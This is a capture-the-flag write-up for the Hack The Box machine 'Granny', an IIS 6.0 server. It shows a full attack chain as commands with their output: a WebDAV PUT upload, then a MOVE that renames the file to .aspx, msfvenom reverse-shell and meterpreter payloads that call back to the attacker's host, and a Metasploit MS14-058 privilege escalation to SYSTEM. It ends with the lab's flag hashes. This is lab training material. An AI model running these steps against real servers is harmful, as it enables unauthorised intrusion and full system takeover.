Granny Write-Up

Machine IP - 10.10.10.15

Initial Phase

We start with an nmap scan, which gives the same result for both the fast as well as complete scan that is just one port open. Also, we can do a default script scan on that port itself to get more options -

root@kali:~/Desktop/Hack The Box/granny# nmap -F 10.10.10.15 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-15 10:44 +04 Nmap scan report for 10.10.10.15 Host is up (0.22s latency). Not shown: 99 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds root@kali:~/Desktop/Hack The Box/granny# nmap -sC -p 80 10.10.10.15 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 09:28 +04 Nmap scan report for 10.10.10.15 Host is up (0.23s latency). PORT STATE SERVICE 80/tcp open http | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-title: Under Construction | http-webdav-scan: | WebDAV type: Unkown | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Server Date: Thu, 09 May 2019 05:23:23 GMT | Server Type: Microsoft-IIS/6.0 |_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK Nmap done: 1 IP address (1 host up) scanned in 5.42 seconds

Since there is no other port to go on, we enumerate on this using uniscan.

root@kali:~/Desktop/Hack The Box/granny# uniscan -qweu http://10.10.10.15/ #################################### # Uniscan project # # http://uniscan.sourceforge.net/ # #################################### V. 6.3 Scan date: 8-5-2019 18:51:1 =================================================================================================== | Domain: http://10.10.10.15/ | Server: Microsoft-IIS/6.0 | IP: 10.10.10.15 =================================================================================================== | Directory check: | [+] CODE: 200 URL: http://10.10.10.15/images/ =================================================================================================== | File check: | [+] CODE: 200 URL: http://10.10.10.15/postinfo.html | [+] CODE: 200 URL: http://10.10.10.15/_vti_bin/shtml.dll/_vti_rpc | [+] CODE: 200 URL: http://10.10.10.15/_vti_bin/shtml.exe | [+] CODE: 200 URL: http://10.10.10.15/_vti_bin/shtml.exe/junk_nonexistant.exe | [+] CODE: 200 URL: http://10.10.10.15/_vti_bin/shtml.exe/_vti_rpc | [+] CODE: 200 URL: http://10.10.10.15/_vti_bin/_vti_adm/admin.dll | [+] CODE: 200 URL: http://10.10.10.15/_vti_inf.html =================================================================================================== | Check robots.txt: | Check sitemap.xml: =================================================================================================== =================================================================================================== Scan end date: 8-5-2019 18:54:34 HTML report saved in: report/10.10.10.15.html

We don't see many useful directories to give us a hint therefore, we do a whatweb to get more information -

root@kali:~/Desktop/Hack The Box/granny# whatweb 10.10.10.15 http://10.10.10.15 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/6.0], IP[10.10.10.15], Microsoft-IIS[6.0][Under Construction], MicrosoftOfficeWebServer[5.0_Pub], UncommonHeaders[microsoftofficewebserver], X-Powered-By[ASP.NET]

This tells us that the server is powered by ASP.NET.

Exploit Phase

The enumeration did not really turn up any hints and thus looking at the nmap scan again, we see that the first entry for the default script scan is that the http_methods that it enumerated have a bunch of potentially risky methods as well. Looking at those, we see that the most useful of them might be PUT method. We can try this using the format of a PUT request -

root@kali:~/Desktop/Hack The Box/granny# cat putreq PUT /testtanq.html HTTP/1.1 Host: 10.10.10.15 Content-Type: text/html Content-Length: 4 tanq

After creating the request body, we can check if it works by sending the request through nc as follows -

root@kali:~/Desktop/Hack The Box/granny# nc 10.10.10.15 80 < putreq HTTP/1.1 201 Created Date: Thu, 09 May 2019 05:53:56 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Location: http://10.10.10.15/testtanq.html Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Thus, we created the file. Using curl to navigate to the given url, we see the text we put -

root@kali:~/Desktop/Hack The Box/granny# curl http://10.10.10.15/testtanq.html tanq

From the whatweb scan, we know that the server executes ASP.NET. Thus, we can upload a reverse shell payload of the file type aspx and get a reverse shell. We can create the payload using msfvenom as follows -

root@kali:~/Desktop/Hack The Box/granny# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.68 LPORT=4445 -f aspx > revshell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2730 bytes

Now, to upload, we need to modify the put request such that it looks like the following -

root@kali:~/Desktop/Hack The Box/granny# cat putreq PUT /revshell.aspx HTTP/1.1 Host: 10.10.10.15 Content-Length: 2730 <%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace="System.IO" %> <script runat="server"> private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; .... .... <payload>

Now if we try to put the same file on the web server, it gives the following result -

root@kali:~/Desktop/Hack The Box/granny# nc 10.10.10.15 80 < putreq HTTP/1.1 403 Forbidden Content-Length: 1758 Content-Type: text/html Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Date: Thu, 09 May 2019 06:22:14 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be displayed</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD> <h1>The page cannot be displayed</h1> You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed. <hr> <p>Please try the following:</p> <ul> <li>Contact the Web site administrator if you believe this directory should allow execute access.</li> </ul> <h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>403</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Configuring ISAPI Extensions</b>, <b>Configuring CGI Applications</b>, <b>Securing Your Site with Web Site Permissions</b>, and <b>About Custom Error Messages</b>.</li> <li>In the IIS Software Development Kit (SDK) or at the <a href="http://go.microsoft.com/fwlink/?LinkId=8181">MSDN Online Library</a>, search for topics titled <b>Developing ISAPI Extensions</b>, <b>ISAPI and CGI</b>, and <b>Debugging ISAPI Extensions and Filters</b>.</li> </ul> </TD></TR></TABLE></BODY></HTML>

It says that we are forbidden to execute, which in other words means we cannot put an executable file. Now, we can try to upload this as html first by changing the name of the file in the putreq, then we see it gets uploaded and also when navigating to it on the web page, it shows the text. This is done because looking back at the nmap scan, the allowed methods also includes MOVE which can be used also to rename inside the server. Therefore, uploading the file as an html and creating the following body for the move request -

root@kali:~/Desktop/Hack The Box/granny# nano putreq #### make changes root@kali:~/Desktop/Hack The Box/granny# head -n 2 putreq PUT /revshell.html HTTP/1.1 Host: 10.10.10.15 root@kali:~/Desktop/Hack The Box/granny# nc 10.10.10.15 80 < putreq HTTP/1.1 201 Created Date: Thu, 09 May 2019 06:52:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Location: http://10.10.10.15/revshell.html Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK ^C root@kali:~/Desktop/Hack The Box/granny# curl http://10.10.10.15/revshell.html <%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace="System.IO" %> <payload> ---- ------ ----- root@kali:~/Desktop/Hack The Box/granny# cat > movreq MOVE /revshell.html HTTP/1.1 Destination: /revshell.aspx Host: 10.10.10.15 root@kali:~/Desktop/Hack The Box/granny# nc 10.10.10.15 80 < movreq HTTP/1.1 201 Created Date: Thu, 09 May 2019 06:54:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Location: http://10.10.10.15/revshell.aspx Content-Type: text/xml Content-Length: 0

Now, we can start listening via nc on port 4445 to get the reverse shell. But the reverse shell keeps on closing with nc. Therefore, we can do the same procedure with a meterpreter shell and get the shell on meterpreter.

root@kali:~/Desktop/Hack The Box/granny# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.68 LPORT=4444 -f aspx > revshell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2804 bytes root@kali:~/Desktop/Hack The Box/granny# cat revshell.aspx <%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace="System.IO" %> ------ <payload> --------- --------- root@kali:~/Desktop/Hack The Box/granny# nano putreq root@kali:~/Desktop/Hack The Box/granny# nano movreq root@kali:~/Desktop/Hack The Box/granny# nc 10.10.10.15 80 < putreq HTTP/1.1 201 Created Date: Thu, 09 May 2019 07:14:11 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Location: http://10.10.10.15/tanqrevshell.html Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK ^C root@kali:~/Desktop/Hack The Box/granny# nc 10.10.10.15 80 < movreq HTTP/1.1 201 Created Date: Thu, 09 May 2019 07:14:19 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Location: http://10.10.10.15/tanqrevshell.aspx Content-Type: text/xml Content-Length: 0

Now that the payload is ready, we just need to start a handler on metasploit and navigate to the webserver. This will grant us a shell -

root@kali:~/Desktop/Hack The Box/granny# msfconsole -q [*] Starting persistent handler(s)... msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set LHOST tun0 LHOST => 10.10.14.68 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.10.14.68:4444 [*] Sending stage (179779 bytes) to 10.10.10.15 [*] Meterpreter session 1 opened (10.10.14.68:4444 -> 10.10.10.15:1033) at 2019-05-09 11:23:45 +0400 meterpreter > meterpreter > sysinfo Computer : GRANNY OS : Windows .NET Server (Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : HTB Logged On Users : 2 Meterpreter : x86/window meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > shell Process 2704 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>systeminfo systeminfo Host Name: GRANNY OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition OS Version: 5.2.3790 Service Pack 2 Build 3790 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Uniprocessor Free Registered Owner: HTB Registered Organization: HTB Product ID: 69712-296-0024942-44782 Original Install Date: 4/12/2017, 5:07:40 PM System Up Time: 0 Days, 7 Hours, 27 Minutes, 59 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 1,023 MB Available Physical Memory: 786 MB Page File: Max Size: 2,470 MB Page File: Available: 2,321 MB Page File: In Use: 149 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. [01]: Q147222 Network Card(s): N/A

Thus, we have a shell. We can now background the session and run the local exploit suggester, which lists many exploits and we can try one by one, the exploits which say the target appears to be vulnerable -

meterpreter > run post/multi/recon/local_exploit_suggester [*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 29 exploit checks are being tried... [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > use exploit/windows/local/ms14_058_track_popup_menu msf5 exploit(windows/local/ms14_058_track_popup_menu) > show options Module options (exploit/windows/local/ms14_058_track_popup_menu): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Windows x86 msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.68 LHOST => 10.10.14.68 msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LPORT 1234 LPORT => 1234 msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit [*] Started reverse TCP handler on 10.10.14.68:1234 [*] Launching notepad to host the exploit... [+] Process 2816 launched. [*] Reflectively injecting the exploit DLL into 2816... [*] Injecting exploit into 2816... [*] Exploit injected. Injecting payload into 2816... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (179779 bytes) to 10.10.10.15 [*] Meterpreter session 2 opened (10.10.14.68:1234 -> 10.10.10.15:1033) at 2019-05-09 17:57:48 +0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > pwd c:\windows\system32 meterpreter > cd .. meterpreter > cd .. meterpreter > cd "Documents and Settings" meterpreter > pwd c:\Documents and Settings meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > cd Lakis meterpreter > pwd c:\Documents and Settings\Lakis meterpreter > cd Desktop meterpreter > pwd c:\Documents and Settings\Lakis\Desktop meterpreter > ls Listing: c:\Documents and Settings\Lakis\Desktop ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100444/r--r--r-- 32 fil 2017-04-12 23:19:57 +0400 user.txt meterpreter > cat user.txt 700c5dc163014e22b3e408f8703f67d1meterpreter > cd .. meterpreter > cd .. meterpreter > cd Administrator meterpreter > cd Desktop meterpreter > ls Listing: c:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100444/r--r--r-- 32 fil 2017-04-12 18:28:50 +0400 root.txt meterpreter > cat root.txt aa4beed1c0584445ab463a6747bd06e9

Thus, we get system and can read the user and root flags.